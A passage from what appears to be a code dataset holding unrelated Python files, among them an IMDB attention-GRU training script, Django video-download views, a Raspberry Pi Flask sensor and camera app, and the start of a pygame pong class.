execution\n# Author: Trinh Man Hoang - 14520320\n# Last Updated: 4/10/2017\n\n\nfrom sklearn.datasets import fetch_lfw_people\nfrom skimage.feature import local_binary_pattern\nimport numpy as np\n\n\n# Extract LBP features and save in data.npy\ndef save():\n    lfw_people = fetch_lfw_people(min_faces_per_person=70, resize=0.4)\n    X = np.array([]).reshape(0,1850)\n    for image in lfw_people.images:\n        lbt_image = local_binary_pattern(image,P=8,R=0.5).flatten()\n        X = np.append(X,[lbt_image],axis=0)\n    
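# With min_faces_per_person=70 and resize=0.4, each LFW image is 50x37 pixels,\n    # so the flattened LBP map has 50*37 = 1850 values -- one row of X per image.\n    # A cheap sanity check before saving: assert X.shape[1] == 1850\n    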
np.save(file='data.npy',arr=X)\n\n# Just uncomment & run the line below 1 time\n#save()\n\n\n# Load features matrix\ndef load():\n    return np.load('data.npy')","sub_path":"ThucHanh_1/BaiTap_3/PreparedData.py","file_name":"PreparedData.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"136895740","text":"import selenium\nfrom selenium import webdriver\nimport calculate\nimport graphic\n\n# Will scrape Yahoo Finance\n\n\nclass tickerScrapper:\n    driver = webdriver.Chrome(executable_path=\".//chromedriver\")\n\n    def __convertArrayToFloat(self, srcArray):\n        i = 0\n        while i < len(srcArray):\n            srcArray[i] = float(srcArray[i].replace(',', '')) / 10000\n            i += 1\n\n    def __scrapDates(self):\n        dates = self.driver.find_element_by_css_selector(\n            \"#Col1-1-Financials-Proxy > section > div:nth-of-type(4) > div > div:nth-of-type(1) > div:nth-of-type(1)\").text\n        dates = dates[13:]\n        dates = [(dates[i:i + 10]) for i in range(0, len(dates), 10)]\n        dates.insert(0, 'TTM')\n        dates = dates[::-1]\n        return dates\n\n    def __scrapRow(self, rows, index):\n        res = rows.find_element_by_css_selector(\n            f\"div:nth-of-type({index})\").text.split('\\n')\n        res = res[1].split(' ')\n        # name-mangled private method: must be called with the double underscore\n        self.__convertArrayToFloat(res)\n        res = res[::-1]\n        return res\n\n    # Parse the html to get date, income, revenue and call Calculate class\n    # to get growth and profit margin\n    def __parser(self):\n        try:\n            rows = self.driver.find_element_by_css_selector(\n                \"#Col1-1-Financials-Proxy > section > div:nth-of-type(4) > div > div:nth-of-type(1) > div:nth-of-type(2)\")\n            dates = self.__scrapDates()\n            revenue = self.__scrapRow(rows, 1)\n            income = self.__scrapRow(rows, 11)\n            calc = calculate.Calculate()\n            growth = calc.yearToYearGrowth(revenue)\n            profitMargin = calc.profitMargin(revenue, income)\n        except Exception as identifier:\n            print(f\"Error: {str(identifier)}\")\n            exit()\n        plot = graphic.Graphic()\n        plot.drawPlot(dates, growth, profitMargin)\n\n    # Check if the ticker exists; if yes, call the parser method\n    def tickersExist(self, ticker):\n        try:\n            self.driver.get(\n                \"https://finance.yahoo.com/quote/\" + ticker + \"/financials\")\n            if \"quote\" not in self.driver.current_url:\n                print(f\"Ticker {ticker} does not exist\")\n                exit()\n        except Exception as e:\n            print(\"Request has failed: \" + str(e))\n            exit()\n        self.__parser()\n","sub_path":"ticketScrapper.py","file_name":"ticketScrapper.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"341798003","text":"import imdb_data\nimport math\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.ops import rnn, rnn_cell\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops.math_ops import tanh\n\n\n# Load the training data\n\nX_train,X_validation,y_train,y_validation = imdb_data.load_imdb_data()\nnum_train = len(X_train)\nnum_validation = len(X_validation)\nprint(num_train)\nprint(num_validation)\n\n\n\n# Network Parameters\nlearning_rate = 0.001\nlearning_rate_decay = 0.70\nlearning_rate_min = 0.0001\ntraining_iters = 500000\nbatch_size = 100\ndisplay_step = 500\ndecay_step = 250\n\nn_input = 200\nn_steps = 200\nn_hidden = 100\nn_classes = 2\n\n\n\n# tf Graph input\nx = tf.placeholder(\"float\", [None, n_steps, n_input])\ny = tf.placeholder(\"float\", [None, n_classes])\n\n\n# Define weights\nweights = {\n    'out': tf.Variable(tf.random_normal([2*n_hidden, 
n_classes]))\n}\nbiases = {\n    'out': tf.Variable(tf.random_normal([n_classes]))\n}\n\nwith tf.variable_scope(\"attention_w\"):\n    W_h = tf.get_variable(\"att_w_1\",[n_hidden, n_hidden])\n    w = tf.get_variable(\"att_w_2\",[n_hidden, 1])\n    W_p = tf.get_variable(\"att_w_3\",[1])\n    W_x = tf.get_variable(\"att_w_4\",[1])\n\nwith tf.variable_scope(\"attention_w_2\"):\n    W_h_2 = tf.get_variable(\"att_w_1_2\",[n_hidden, n_hidden])\n    w_2 = tf.get_variable(\"att_w_2_2\",[n_hidden, 1])\n    W_p_2 = tf.get_variable(\"att_w_3_2\",[1])\n    W_x_2 = tf.get_variable(\"att_w_4_2\",[1])\n\n# Construct network\ndef RNN(x, weights, biases):\n    x = tf.transpose(x, [1, 0, 2])\n    x = tf.reshape(x, [-1, n_input])\n    x = tf.split(0, n_steps, x)\n    gru_fw_cell = rnn_cell.GRUCell(n_hidden)\n    gru_fw_cell = tf.nn.rnn_cell.DropoutWrapper(gru_fw_cell, output_keep_prob=0.7)\n    gru_bw_cell = rnn_cell.GRUCell(n_hidden)\n    gru_bw_cell = tf.nn.rnn_cell.DropoutWrapper(gru_bw_cell, output_keep_prob=0.7)\n    outputs, outputs_fw, outputs_bw = rnn.bidirectional_rnn(gru_fw_cell, gru_bw_cell, x,dtype=tf.float32) # Nlist * batch * 2hidden\n\n    batch_s = 100\n    outputs_all = tf.concat(0,outputs) # (N*batch) * (2*n_hidden)\n    outputs_fw_all = outputs_all[:,0:n_hidden] # (N*batch) * n_hidden\n    outputs_bw_all = outputs_all[:,n_hidden:2*n_hidden] # (N*batch) * n_hidden\n\n    # dropout\n    outputs_fw_all = tf.nn.dropout(outputs_fw_all, keep_prob=0.5)\n    outputs_bw_all = tf.nn.dropout(outputs_bw_all, keep_prob=0.5)\n\n    M_fw = tanh(tf.matmul(outputs_fw_all,W_h)) # (N*batch) * n_hidden\n    # the backward attention must be computed from the backward outputs\n    M_bw = tanh(tf.matmul(outputs_bw_all,W_h_2)) # (N*batch) * n_hidden\n\n    # dropout\n    M_fw = tf.nn.dropout(M_fw, keep_prob=0.5)\n    M_bw = tf.nn.dropout(M_bw, keep_prob=0.5)\n\n    a_fw = tf.matmul(M_fw,w)\n    #a = tanh(tf.matmul(outputs_fw_all,w))\n    a_fw = tf.reshape(a_fw, [n_steps,-1]) # N*batch\n    a_fw = tf.transpose(a_fw, [1,0]) # batch*N\n    a_fw = tf.nn.softmax(a_fw)\n    a_fw = tf.reshape(a_fw, [batch_s,1,n_steps]) # batch*1*N\n\n\n    a_bw = tf.matmul(M_bw,w_2)\n    #a = tanh(tf.matmul(outputs_bw_all,w_2))\n    a_bw = tf.reshape(a_bw, [n_steps,-1]) # N*batch\n    a_bw = tf.transpose(a_bw, [1,0]) # batch*N\n    a_bw = tf.nn.softmax(a_bw)\n    a_bw = tf.reshape(a_bw, [batch_s,1,n_steps]) # batch*1*N\n\n    #-------------------------------------------------------------------------------------\n\n    outputs_fw_all = tf.reshape(outputs_fw_all, [n_steps,-1, n_hidden]) # N*batch*d\n    outputs_fw_all = tf.transpose(outputs_fw_all, [1,0,2]) # batch*N*d\n    outputs_bw_all = tf.reshape(outputs_bw_all, [n_steps,-1, n_hidden]) # N*batch*d\n    outputs_bw_all = tf.transpose(outputs_bw_all, [1,0,2]) # batch*N*d\n\n    a_fw = tf.split(0, batch_s, a_fw)\n    outputs_fw_all = tf.split(0, batch_s, outputs_fw_all)\n    a_bw = tf.split(0, batch_s, a_bw)\n    outputs_bw_all = tf.split(0, batch_s, outputs_bw_all)\n\n    r_fw = []\n    r_bw = []\n    for i in range(batch_s):\n        a_fw_2 = a_fw[i][0:1,:,:]\n        o_fw_2 = outputs_fw_all[i][0:1,:,:]\n        att_fw = tf.reshape(a_fw_2,[1, n_steps]) # 1*N\n        out_fw = tf.reshape(o_fw_2,[n_steps,n_hidden]) # N*n_hidden\n\n        a_bw_2 = a_bw[i][0:1,:,:]\n        o_bw_2 = outputs_bw_all[i][0:1,:,:]\n        att_bw = tf.reshape(a_bw_2,[1, n_steps]) # 1*N\n        out_bw = tf.reshape(o_bw_2,[n_steps,n_hidden]) # N*n_hidden\n\n        # dropout\n        #att = tf.nn.dropout(att, keep_prob=0.5)\n        #out = tf.nn.dropout(out, keep_prob=0.5)\n\n        r_fw.append(tf.matmul(att_fw,out_fw))\n        r_bw.append(tf.matmul(att_bw,out_bw))\n    r_fw = tf.concat(0,r_fw) # batch*d\n    r_bw = tf.concat(0,r_bw) # batch*d\n    #_h = tanh(W_p*r_fw + W_p_2*r_bw + W_x*outputs[-1])\n    _h_1 = W_p*r_fw + 
W_x*outputs_fw\n _h_2 = W_p_2*r_bw + W_x_2*outputs_bw\n _h = tf.concat(1,[_h_1,_h_2])\n\n # dropout\n _h = tf.nn.dropout(_h, keep_prob=0.25)\n\n predict = tf.matmul(_h, weights['out']) + biases['out']\n return predict,outputs\n\npred,outputs_2 = RNN(x, weights, biases)\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(pred, y))\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\ncorrect_pred = tf.equal(tf.argmax(pred,1), tf.argmax(y,1))\naccuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\nvalidation_accuracy = tf.placeholder(\"float\")\ntf.scalar_summary('validation_accuracy', validation_accuracy)\ntrain_accuracy = tf.placeholder(\"float\")\ntf.scalar_summary('train_accuracy', train_accuracy)\ntrain_loss = tf.placeholder(\"float\")\ntf.scalar_summary('train_loss', train_loss)\n\n\ninit = tf.initialize_all_variables()\n\nwith tf.Session() as sess:\n merged = tf.merge_all_summaries()\n writer = tf.train.SummaryWriter('tensorboard/att_mul_dropout/att/no_dropout', sess.graph)\n sess.run(init)\n step = 0\n step_all = 0\n # train\n while step_all * batch_size <= training_iters:\n index_start = step*batch_size\n index_end = index_start+batch_size\n batch_x = X_train[index_start:index_end]\n batch_y = y_train[index_start:index_end]\n\n '''\n print(sess.run(outputs_2[50][0:1,0:200], feed_dict={x: batch_x, y: batch_y}))\n print(sess.run(_h[0:1,0:200], feed_dict={x: batch_x, y: batch_y}))\n exit()\n '''\n\n sess.run(optimizer, feed_dict={x: batch_x, y: batch_y})\n\n # display_step\n if step_all % display_step == 0:\n # validation\n acc_validation_all = 0\n step_v = 0\n for validation_step in range(int(num_validation//batch_size)):\n index_start_v = validation_step*batch_size\n index_end_v = index_start_v+batch_size\n acc_v = sess.run(accuracy,feed_dict={x:X_validation[index_start_v:index_end_v],y: y_validation[index_start_v:index_end_v]})\n acc_validation_all += acc_v\n step_v += 1\n accuracy_validation = acc_validation_all/step_v\n # train\n acc_train_batch = sess.run(accuracy, feed_dict={x: batch_x, y: batch_y})\n loss_train_batch = sess.run(cost, feed_dict={x: batch_x, y: batch_y})\n # summary\n result = sess.run(merged,feed_dict={\n x: batch_x, \n y: batch_y,\n validation_accuracy: accuracy_validation,\n train_accuracy: acc_train_batch,\n train_loss: loss_train_batch})\n writer.add_summary(result, step_all)\n print(\"Validation accuracy = %.5f\" % (accuracy_validation))\n print(\"Iter \" + str(step_all*batch_size) + \", Minibatch Loss= \" + \\\n \"{:.6f}\".format(loss_train_batch) + \", Training Accuracy= \" + \\\n \"{:.5f}\".format(acc_train_batch) + \", Learning rate = \" + \\\n \"{:.10f}\".format(learning_rate))\n\n # learning rate\n if (step_all % decay_step == 0 and step_all != 0):\n learning_rate = learning_rate * learning_rate_decay\n if learning_rate < learning_rate_min:\n learning_rate = learning_rate_min\n\n # change steps\n step += 1\n step_all += 1\n if step == int(math.floor(len(X_train)/batch_size)):\n step = 0\n print(\"Optimization Finished!\")\n\n\n","sub_path":"experiment_imdb/imdb_bigru_attention_3.py","file_name":"imdb_bigru_attention_3.py","file_ext":"py","file_size_in_byte":8299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"104428452","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2018/12/02 16:28\n@author: Sucre\n@email: qian.dong.2018@gmail.com\n\"\"\"\n\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution:\n 
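# Approach: decode each reversed-digit list into an int, add the two ints,\n    # then re-encode the sum. Worked example: 2->4->3 encodes 342 and 5->6->4\n    # encodes 465; 342 + 465 = 807, which is returned as 7->0->8.\n    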
def addTwoNumbers(self, l1, l2):\n        \"\"\"\n        :type l1: ListNode\n        :type l2: ListNode\n        :rtype: ListNode\n        \"\"\"\n        l1 = self.get_number(l1)\n        l2 = self.get_number(l2)\n        output = self.get_list(l1 + l2)\n        return output\n\n    def get_number(self, linked_list):\n        value = 0\n        cnt = 0\n        while linked_list is not None:\n            value += linked_list.val * (10 ** cnt)\n            linked_list = linked_list.next\n            cnt += 1\n        return value\n\n    def get_list(self, value):\n        value = str(value)\n        value = value[::-1]\n        head = ListNode(int(value[0]))\n        cur = head\n        for num in value[1:]:\n            cur.next = ListNode(int(num))\n            cur = cur.next\n        return head\n\n\nif __name__ == \"__main__\":\n    s = Solution()\n    head0 = s.get_list(0)\n    head1 = s.get_list(0)\n    output = s.addTwoNumbers(head0, head1)\n    print(output.next)\n    v = s.get_number(output)\n    print(v)\n","sub_path":"_002_add_two_numbers.py","file_name":"_002_add_two_numbers.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"535035718","text":"import ctypes as ct\nimport numpy as np\n\nimport sharpy.utils.algebra as algebra\nimport sharpy.aero.utils.uvlmlib as uvlmlib\nimport sharpy.utils.settings as settings\nfrom sharpy.utils.solver_interface import solver, BaseSolver\nimport sharpy.utils.generator_interface as gen_interface\nimport sharpy.utils.cout_utils as cout\n\n\n@solver\nclass StepUvlm(BaseSolver):\n    solver_id = 'StepUvlm'\n\n    def __init__(self):\n        # settings list\n        self.settings_types = dict()\n        self.settings_default = dict()\n\n        self.settings_types['print_info'] = 'bool'\n        self.settings_default['print_info'] = True\n\n        self.settings_types['num_cores'] = 'int'\n        self.settings_default['num_cores'] = 0\n\n        self.settings_types['n_time_steps'] = 'int'\n        self.settings_default['n_time_steps'] = 100\n\n        self.settings_types['convection_scheme'] = 'int'\n        self.settings_default['convection_scheme'] = 3\n\n        self.settings_types['dt'] = 'float'\n        self.settings_default['dt'] = 0.1\n\n        self.settings_types['iterative_solver'] = 'bool'\n        self.settings_default['iterative_solver'] = False\n\n        self.settings_types['iterative_tol'] = 'float'\n        self.settings_default['iterative_tol'] = 1e-4\n\n        self.settings_types['iterative_precond'] = 'bool'\n        self.settings_default['iterative_precond'] = False\n\n        self.settings_types['velocity_field_generator'] = 'str'\n        self.settings_default['velocity_field_generator'] = 'SteadyVelocityField'\n\n        self.settings_types['velocity_field_input'] = 'dict'\n        self.settings_default['velocity_field_input'] = {}\n\n        self.settings_types['rho'] = 'float'\n        self.settings_default['rho'] = 1.225\n\n        self.data = None\n        self.settings = None\n        self.velocity_generator = None\n\n    def initialise(self, data, custom_settings=None):\n        self.data = data\n        if custom_settings is None:\n            self.settings = data.settings[self.solver_id]\n        else:\n            self.settings = custom_settings\n        settings.to_custom_types(self.settings, self.settings_types, self.settings_default)\n\n        self.data.structure.add_unsteady_information(self.data.structure.dyn_dict, self.settings['n_time_steps'].value)\n\n        # init velocity generator\n        velocity_generator_type = gen_interface.generator_from_string(\n            self.settings['velocity_field_generator'])\n        self.velocity_generator = velocity_generator_type()\n        self.velocity_generator.initialise(self.settings['velocity_field_input'])\n\n    def run(self,\n            aero_tstep=None,\n            structure_tstep=None,\n            convect_wake=True,\n            dt=None,\n            t=None):\n\n        if aero_tstep is None:\n            aero_tstep = 
self.data.aero.timestep_info[-1]\n        if structure_tstep is None:\n            structure_tstep = self.data.structure.timestep_info[-1]\n        if dt is None:\n            dt = self.settings['dt'].value\n        if t is None:\n            t = self.data.ts*dt\n\n        # generate uext\n        self.velocity_generator.generate({'zeta': aero_tstep.zeta,\n                                          'override': True,\n                                          't': t,\n                                          'ts': self.data.ts,\n                                          'dt': dt,\n                                          'for_pos': structure_tstep.for_pos},\n                                         aero_tstep.u_ext)\n        if self.settings['convection_scheme'].value > 1 and convect_wake:\n            # generate uext_star\n            self.velocity_generator.generate({'zeta': aero_tstep.zeta_star,\n                                              'override': True,\n                                              'ts': self.data.ts,\n                                              'dt': dt,\n                                              't': t,\n                                              'for_pos': structure_tstep.for_pos},\n                                             aero_tstep.u_ext_star)\n\n        # previous_ts = max(len(self.data.aero.timestep_info) - 1, 0) - 1\n        # previous_ts = -1\n        # print('previous_step max circulation: %f' % previous_aero_tstep.gamma[0].min())\n        # print('current step max circulation: %f' % aero_tstep.gamma[0].min())\n        uvlmlib.uvlm_solver(self.data.ts,\n                            aero_tstep,\n                            structure_tstep,\n                            self.settings,\n                            convect_wake=convect_wake,\n                            dt=dt)\n        # print('current step max unsforce: %f' % aero_tstep.dynamic_forces[0].max())\n\n        # calculate unsteady (added mass) forces:\n        self.data.aero.compute_gamma_dot(dt, aero_tstep, self.data.aero.timestep_info[-3:-1])\n        uvlmlib.uvlm_calculate_unsteady_forces(aero_tstep,\n                                               structure_tstep,\n                                               self.settings,\n                                               convect_wake=convect_wake,\n                                               dt=dt)\n        return self.data\n\n    def add_step(self):\n        self.data.aero.add_timestep()\n\n    def update_grid(self, beam):\n        self.data.aero.generate_zeta(beam, self.data.aero.aero_settings, -1, beam_ts=-1)\n\n    def update_custom_grid(self, structure_tstep, aero_tstep):\n        self.data.aero.generate_zeta_timestep_info(structure_tstep, aero_tstep, self.data.structure, self.data.aero.aero_settings)\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"sharpy/solvers/stepuvlm.py","file_name":"stepuvlm.py","file_ext":"py","file_size_in_byte":5552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"215327688","text":"import csv\n\ninput_data = open('C://Users//DELL//Desktop//Web-scrapping_Prediction-modeling-master//Data.csv', 'r')\noutput_data = open('C://Users//DELL//Desktop//Web-scrapping_Prediction-modeling-master//Mining2.csv', 'w')\n\nData = csv.reader(input_data, delimiter=',')\n\noutput_data.write(\"Brand,Processor,RAM,OS,Display,Touch,Price\\n\")\narr = [\"Brand\", \"Processor\", \"RAM\", \"OS\", \"Display\", \"Touch\", \"Price\"]\n\nflag = 0\nfor row in Data:\n    if flag == 0:\n        flag = 1\n        continue\n    count = 0\n    for column in row:\n        if count == 0 or count == 2:\n            Brand = column.split(\" \")[0]\n            output_data.write(Brand + \",\")\n        elif count == 1 or count == 3:\n            Processer = column.split(\" \")\n            print(Processer)\n            Processer = Processer[0] + Processer[1] + Processer[2]\n            output_data.write(Processer + \",\") \n        elif count == 4:\n            Display = column.split(\" \")[0]\n            output_data.write(Display + \",\") \n            if \"Touchscreen\" in column:\n                output_data.write(\"1,\")\n            else:\n                output_data.write(\"0,\")\n        else:\n            output_data.write(column)\n        count += 1\n    \n    output_data.write(\"\\n\")\n    \ninput_data.close()\noutput_data.close()","sub_path":"Preprocessing.py","file_name":"Preprocessing.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"332166388","text":"# -*- coding: utf-8 -*-\nfrom django.http import HttpResponse\nfrom django.core.servers.basehttp import FileWrapper\nimport os\nfrom 
video.models import BannerVideo,HotVideo,VideoType,Course,Video,TopVideo\nfrom video.serializers import VideoSerializer\nfrom django.http import Http404\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.authentication import SessionAuthentication, BasicAuthentication\nfrom rest_framework.permissions import IsAuthenticated\nclass VideoIndex(APIView):\n    authentication_classes = (SessionAuthentication, BasicAuthentication)\n    permission_classes = (IsAuthenticated,)\n    def get(self, request, format=None):\n        banner=BannerVideo.objects.last()\n        if banner:\n            banner=banner.video.values('id','img','title','isVip')\n        hotvideo=HotVideo.objects.last()\n        if hotvideo:\n            hotvideo=hotvideo.video.values('id','img','title','isVip')\n        typevideo=VideoType.objects.values('id','img','name','style')\n        data={'success':True,'banner':banner,'hotvideo':hotvideo,'type':typevideo}\n        return Response(data)\n    \nclass TypeVideo(APIView):\n    authentication_classes = (SessionAuthentication, BasicAuthentication)\n    permission_classes = (IsAuthenticated,)\n    def get_object(self, pk):\n        try:\n            return VideoType.objects.get(pk=pk)\n        except VideoType.DoesNotExist:\n            raise Http404\n    def get(self,request,pk,format=None):\n        videotype=self.get_object(pk)\n        course=videotype.course_set.values('id','title','img','isVip')\n        data={'success':True,'course':course,'type':1}\n        return Response(data)\n    \nclass NormalVideo(APIView):\n    authentication_classes = (SessionAuthentication, BasicAuthentication)\n    permission_classes = (IsAuthenticated,)\n    def get_object(self, pk):\n        try:\n            return VideoType.objects.get(pk=pk)\n        except VideoType.DoesNotExist:\n            raise Http404\n    def get(self,request,vtype,pk,page,format=None):\n        page=int(page)\n        if page==0:\n            page=1\n        start=(page-1)*10\n        end=start+10\n        videotype=self.get_object(pk)\n        videos=videotype.video_set.order_by('-isTop','-isVip',)[start:end].values('id','title','img','desc','isVip','isTop')\n        data={'success':True,'videos':videos,'type':vtype}\n        return Response(data)\nclass CourseDetail(APIView):\n    authentication_classes = (SessionAuthentication, BasicAuthentication)\n    permission_classes = (IsAuthenticated,)\n    def get_object(self,pk):\n        try:\n            return Course.objects.get(pk=pk)\n        except Course.DoesNotExist:\n            raise Http404\n    def get(self,request,pk,format=None):\n        course=self.get_object(pk)\n        videolist=course.video_set.order_by('-isTop','-isVip').values('id','title','img','desc','isVip','isTop')\n        data={'success':True,'videos':videolist}\n        return Response(data)\nclass VideoDetail(APIView):\n    authentication_classes = (SessionAuthentication, BasicAuthentication)\n    permission_classes = (IsAuthenticated,)\n    def get_object(self,pk):\n        try:\n            return Video.objects.get(pk=pk)\n        except Video.DoesNotExist:\n            raise Http404\n    def get(self,request,pk,format=None):\n        video=self.get_object(pk)\n        serializer = VideoSerializer(video)\n        data={'success':True,'video':serializer.data}\n        return Response(data)\nclass VideoSearch(APIView):\n    authentication_classes = (SessionAuthentication, BasicAuthentication)\n    permission_classes = (IsAuthenticated,)\n    def get(self,request,format=None):\n        name=request.GET.get('name','')\n        name=name.strip()\n        if name:\n            videos=Video.objects.filter(title__icontains=name).order_by('-isTop','-isVip').values('id','title','img','desc','isVip','isTop')\n            \n            data={'success':True,'video':videos}\n        else:\n            data={'success':False,'err_code':1004,'err_msg':'empty query'}\n        return Response(data)\nclass 
LoadVideo(APIView):\n    authentication_classes = (SessionAuthentication, BasicAuthentication)\n    permission_classes = (IsAuthenticated,)\n    def get_object(self, pk):\n        try:\n            return Video.objects.get(pk=pk)\n        except Video.DoesNotExist:\n            raise Http404\n    def get(self,request,pk,format=None):\n        user=request.user\n        video=self.get_object(pk)\n        if video.isVip and not user.isvip:\n            data={'success':False,'err_msg':'user is not vip'}\n            return Response(data)\n        path=video.myVideo.path\n        response = HttpResponse(FileWrapper(file(path)), content_type = 'application/octet-stream')\n        response['Content-Length'] = os.path.getsize(path)\n        response['Content-Disposition'] = 'attachment; filename = %s.mp4' % video.title.encode('utf-8')\n        user.videos.add(video)\n        user.save()\n        return response\nclass LoadVideo_nginx(APIView):\n    authentication_classes = (SessionAuthentication, BasicAuthentication)\n    permission_classes = (IsAuthenticated,)\n    def get_object(self, pk):\n        try:\n            return Video.objects.get(pk=pk)\n        except Video.DoesNotExist:\n            raise Http404\n    def get(self,request,pk,format=None):\n        user=request.user\n        video=self.get_object(pk)\n        if video.isVip and not user.isvip:\n            data={'success':False,'err_msg':'user is not vip'}\n            return Response(data)\n        name=video.myVideo.name.split('/')[-1]\n        response = HttpResponse()\n        response['Content-Type']='application/octet-stream'\n        response['Content-Length'] = os.path.getsize(video.myVideo.path)\n        response['Content-Disposition'] = 'attachment; filename = %s' %name.encode('utf-8')\n        response['X-Accel-Redirect']='/download/%s'%video.myVideo.name\n        user.videos.add(video)\n        user.save()\n        return response\n\n","sub_path":"video/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"289019813","text":"# encoding: utf-8\nimport os\nfrom time import sleep\nfrom flask import Flask, render_template, request, Response\nimport Adafruit_DHT\nimport RPi.GPIO as GPIO\nfrom camera_pi import Camera\n\napp = Flask(__name__)\n\nGPIO.setmode(GPIO.BCM)\nR,G,Y = 20,21,16\nFIRE = 22\nSMOKE = 27\n\ndef getDHTdata(): \n    DHT22Sensor = Adafruit_DHT.DHT22\n    DHTpin = 17\n    hum, temp = Adafruit_DHT.read_retry(DHT22Sensor, DHTpin)\n    \n    if hum is not None and temp is not None:\n        hum = round(hum)\n        temp = round(temp, 1)\n    return temp, hum\n\ndef detect():\n    GPIO.setup(SMOKE,GPIO.IN)\n    GPIO.setup(FIRE,GPIO.IN)\n    GPIO.setup(R,GPIO.OUT)\n    GPIO.setup(G,GPIO.OUT)\n    GPIO.setup(Y,GPIO.OUT)\n    #f = GPIO.input(FIRE)\n    #y = GPIO.input(SMOKE)\n    if GPIO.input(SMOKE) == GPIO.LOW:\n        GPIO.output(G,GPIO.LOW)\n        GPIO.output(Y,GPIO.HIGH)\n        u = \"GAS!\"\n        if GPIO.input(FIRE) == GPIO.LOW:\n            GPIO.output(R,GPIO.HIGH)\n            u = \"GAS AND FIRE!!\"\n        if GPIO.input(FIRE) == GPIO.HIGH:\n            GPIO.output(R,GPIO.LOW)\n    \n    if GPIO.input(SMOKE) == GPIO.HIGH:\n        GPIO.output(Y,GPIO.LOW)\n        if GPIO.input(FIRE) == GPIO.LOW:\n            GPIO.output(G,GPIO.LOW)\n            GPIO.output(R,GPIO.HIGH)\n            u = \"FIRE!\"\n        if GPIO.input(FIRE) == GPIO.HIGH:\n            GPIO.output(R,GPIO.LOW)\n            GPIO.output(G,GPIO.HIGH)\n            u = \"OK~\"\n    return u\n@app.route(\"/\")\ndef index():\n    return render_template('index.html')\n\n@app.route(\"/detect\")\ndef dht():\n    #timeNow = time.asctime( time.localtime(time.time()) )\n    temp, hum = getDHTdata()\n    u = detect()\n    templateData = {\n        #'time': timeNow,\n        'temp': temp,\n        'hum' : hum,\n        'u' : u\n    }\n    return render_template('detect.html', **templateData)\n\nglobal panServoAngle\nglobal tiltServoAngle\npanServoAngle = 90\ntiltServoAngle = 
0\n\npanPin = 18\n#tiltPin = 17  # disabled: GPIO 17 is already used by the DHT22 sensor above, so 'tilt' moves need a free pin first\n\n@app.route('/camera')\ndef camera():\n    \"\"\"Video streaming home page.\"\"\"\n    \n    templateData = {\n        'panServoAngle'\t: panServoAngle,\n        'tiltServoAngle'\t: tiltServoAngle\n\t}\n    return render_template('camera.html', **templateData)\n\n\ndef gen(camera):\n    \"\"\"Video streaming generator function.\"\"\"\n    while True:\n        frame = camera.get_frame()\n        yield (b'--frame\\r\\n'\n               b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\n\n\n@app.route('/video_feed')\ndef video_feed():\n    \"\"\"Video streaming route. Put this in the src attribute of an img tag.\"\"\"\n    return Response(gen(Camera()),\n                    mimetype='multipart/x-mixed-replace; boundary=frame')\n\n\n@app.route(\"/<servo>/<angle>\")\ndef move(servo, angle):\n\tglobal panServoAngle\n\tglobal tiltServoAngle\n\tif servo == 'pan':\n\t\tif angle == '+':\n\t\t\tpanServoAngle = panServoAngle + 30\n\t\telse:\n\t\t\tpanServoAngle = panServoAngle - 30\n\t\tos.system(\"python3 angleServoCtrl.py \" + str(panPin) + \" \" + str(panServoAngle))\n\tif servo == 'tilt':\n\t\tif angle == '+':\n\t\t\ttiltServoAngle = tiltServoAngle + 30\n\t\telse:\n\t\t\ttiltServoAngle = tiltServoAngle - 30\n\t\tos.system(\"python3 angleServoCtrl.py \" + str(tiltPin) + \" \" + str(tiltServoAngle))\n\t\n\ttemplateData = {\n        'panServoAngle'\t: panServoAngle,\n        'tiltServoAngle'\t: tiltServoAngle\n\t}\n\treturn render_template('camera.html', **templateData)\n\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0', port = 8080, debug=True, threaded=True)\n","sub_path":"home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"650935515","text":"#!/usr/bin/python\n#\n# 1st version of pong with classes\n#\n#\n\nimport pygame, sys, random\nfrom pygame.locals import *\n\n# we will still keep some globals around for things like the\n# game world constants\n\nSCREEN_WIDTH = 640\nSCREEN_HEIGHT = 480\nFRAMERATE = 60\n\n# initialize pygame\npygame.init()\n# make a global clock\nCLOCK = pygame.time.Clock()\n# our display surface will also be global for now\nSCREEN = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\npygame.display.set_caption(\"A game of pong!\")\n\n# let's create a paddle class\nclass Paddle(object):\n    \"\"\"\n    Represents a player paddle for a game of pong.\n    It keeps track of the paddle's position, velocity, and color.\n    It handles control of the paddle and collision detection as well.\n    \"\"\"\n    def __init__(self, x, y, color=(255, 0, 0)):\n        self.x = x\n        self.y = y\n        self.w = 10 # width\n        self.h = 100 # height\n        self.color = color\n        self.dy = 10 # motion speed\n        self.paddle_up = self.paddle_down = False # paddle is not moving\n        self.draw()\n\n    